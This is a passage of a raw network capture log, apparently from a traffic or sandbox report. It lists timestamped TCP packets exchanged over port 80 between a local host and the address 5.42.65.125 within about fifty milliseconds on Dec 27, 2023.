Dec 27, 2023 18:12:24.882361889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882375002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882385969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.882416010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.883199930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883284092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883296013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883306980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883318901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883322954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.883328915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883342028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.883344889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883358002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.883368015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.883388042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.883990049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884027004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.884080887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884092093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884104013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884114981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884130001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.884147882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.884164095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884175062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884186029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884227991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.884835005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.884875059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.885010004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900069952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900083065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900094032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900108099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900131941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.900156021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900167942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900180101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900193930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900204897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900216103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900227070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900238037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.900306940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.900306940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.900306940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.900306940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.900306940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.905525923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905555010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905595064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.905596018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905635118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.905709028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905783892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905807018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905824900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905839920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.905848980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.905862093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.906328917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906362057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906394005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.906398058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906434059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.906466007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906476021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906486988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906497955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906516075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.906532049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.907176018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907191992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907227039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.907239914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907252073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907279015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.907310963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907345057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907346010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.907356024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907408953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.907445908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.910621881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.911072969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.911123037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.911216021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.911230087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.911262989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.912167072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.912208080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.912657022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.912950039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.912961960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913002014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913428068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913440943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913475037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913625956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913638115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913649082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913660049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913667917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913671970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913682938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913682938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913693905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913705111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913706064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913717985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913728952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913737059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913741112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913744926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913752079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913765907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913777113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913789034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913799047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913831949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.913978100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.913991928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914032936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.914119959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914132118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914144039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914155006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914161921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.914167881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.914196014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915005922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915019035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915057898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915150881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915163040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915174007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915186882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915199995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915209055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915277958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915290117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915301085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.915316105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915329933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.915410042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916193008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916205883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916217089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916229010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916239977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916249037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.916279078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.916347027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916357994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916369915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.916408062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.917143106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917155027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917166948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917196035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.917207003 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.917265892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917279005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917289972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917300940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.917336941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.917346954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.917406082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918013096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918025017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918036938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918049097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918060064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918066025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.918091059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.918102026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.918180943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918193102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918205023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.918226004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.918879032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919068098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919079065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919090986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919101954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919111013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.919114113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919126034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919136047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.919137955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919179916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.919924974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919936895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919948101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919959068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919970036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919971943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.919981956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.919991016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.919994116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920006037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920011044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.920033932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.920506954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920519114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920561075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.920864105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920876026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920887947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920900106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920908928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.920912981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920926094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.920927048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.920953035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.921006918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921019077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921044111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.921657085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921669960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921680927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921693087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921700954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.921760082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.921839952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921852112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921863079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921875954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.921885967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.921914101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.922405005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922435999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.922605991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922617912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922629118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922641039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922662020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.922688007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.922758102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922769070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922780037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.922806025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.923460007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923472881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923508883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.923612118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923624039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923635006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923646927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923655033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.923657894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923670053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.923670053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.923701048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.924052954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924067020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924091101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.924201012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924212933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924242020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.924335003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924348116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924360991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.924384117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.924401045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.924463034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925318956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925333977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925347090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925379038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.925467968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925482988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925493956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925506115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925518990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.925523996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.925550938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.926145077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926157951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926199913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.926294088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926336050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.926553011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926565886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926575899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926589966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926595926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.926605940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926616907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926623106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.926628113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.926651001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.927222967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927238941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927251101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927263021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927263975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.927278042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927289009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.927299023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927313089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.927458048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927470922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927504063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.927942991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927956104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927968979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.927982092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.928010941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.928072929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928227901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928241968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928256035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928267956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928267956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.928307056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.928924084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928937912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928947926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928960085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928972960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.928972960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.928989887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.929013968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.929101944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929116011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929126978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929151058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.929842949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929855108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929866076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929877996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929888010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.929903984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:24.929984093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.929996014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930006981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930018902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:24.930023909 CET	49738	80	192.168.2.4	5.42.65.125
